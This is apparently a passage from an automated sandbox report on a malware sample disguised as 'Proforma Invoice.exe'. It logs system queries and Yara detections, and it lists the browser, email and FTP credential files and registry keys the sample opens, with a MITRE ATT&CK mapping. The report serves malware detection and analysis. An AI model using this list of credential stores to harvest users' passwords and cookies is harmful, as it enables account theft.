                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\FORTE.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\FELIXTI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\ERASMD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\ERASBD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\ENGR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\CURLZ___.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\COPRGTL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\COPRGTB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\CENSCBK.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\micross.ttf | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\segoeuii.ttf | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\segoeuiz.ttf | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Users\user\Desktop\Proforma Invoice.exe | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll | VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Proforma Invoice.exe PID: 7152, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Proforma Invoice.exe PID: 1500, type: MEMORYSTR
Source: Yara match | File source: 8.0.Proforma Invoice.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.Proforma Invoice.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Proforma Invoice.exe.459ae68.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.Proforma Invoice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.Proforma Invoice.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.Proforma Invoice.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Proforma Invoice.exe.45cf688.11.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Proforma Invoice.exe.45cf688.11.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Proforma Invoice.exe.459ae68.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.Proforma Invoice.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Proforma Invoice.exe.4564848.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000000.410969105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.421261359.0000000004564000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.636659642.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.412155830.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.412961855.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.410130498.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Proforma Invoice.exe PID: 7152, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Proforma Invoice.exe PID: 1500, type: MEMORYSTR
Source: C:\Users\user\Desktop\Proforma Invoice.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\Proforma Invoice.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\Desktop\Proforma Invoice.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\Proforma Invoice.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Users\user\Desktop\Proforma Invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Proforma Invoice.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\Proforma Invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: Yara match | File source: 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Proforma Invoice.exe PID: 1500, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Proforma Invoice.exe PID: 7152, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Proforma Invoice.exe PID: 1500, type: MEMORYSTR
Source: Yara match | File source: 8.0.Proforma Invoice.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.Proforma Invoice.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Proforma Invoice.exe.459ae68.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.Proforma Invoice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.Proforma Invoice.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.Proforma Invoice.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Proforma Invoice.exe.45cf688.11.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Proforma Invoice.exe.45cf688.11.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Proforma Invoice.exe.459ae68.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.Proforma Invoice.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Proforma Invoice.exe.4564848.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000000.410969105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.421261359.0000000004564000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.636659642.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.412155830.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.412961855.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.410130498.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Proforma Invoice.exe PID: 7152, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Proforma Invoice.exe PID: 1500, type: MEMORYSTR
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation (211) | Scheduled Task/Job (1) | Process Injection (11) | Disable or Modify Tools (11) | OS Credential Dumping (2) | File and Directory Discovery (1) | Remote Services | Archive Collected Data (11) | Exfiltration Over Other Network Medium | Web Service (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job (1) | Boot or Logon Initialization Scripts | Scheduled Task/Job (1) | Deobfuscate/Decode Files or Information (1) | Credentials in Registry (1) | System Information Discovery (114) | Remote Desktop Protocol | Data from Local System (2) | Exfiltration Over Bluetooth | Encrypted Channel (11) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information (2) | Security Account Manager | Query Registry (1) | SMB/Windows Admin Shares | Email Collection (1) | Automated Exfiltration | Non-Application Layer Protocol (2) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Software Packing (13) | NTDS | Security Software Discovery (311) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (3) | SIM Card Swap | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading (1) | LSA Secrets | Process Discovery (1) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion (131) | Cached Domain Credentials | Virtualization/Sandbox Evasion (131) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection (11) | DCSync | Application Window Discovery (1) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | Remote System Discovery (1) | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
Behavior Graph ID: 668067
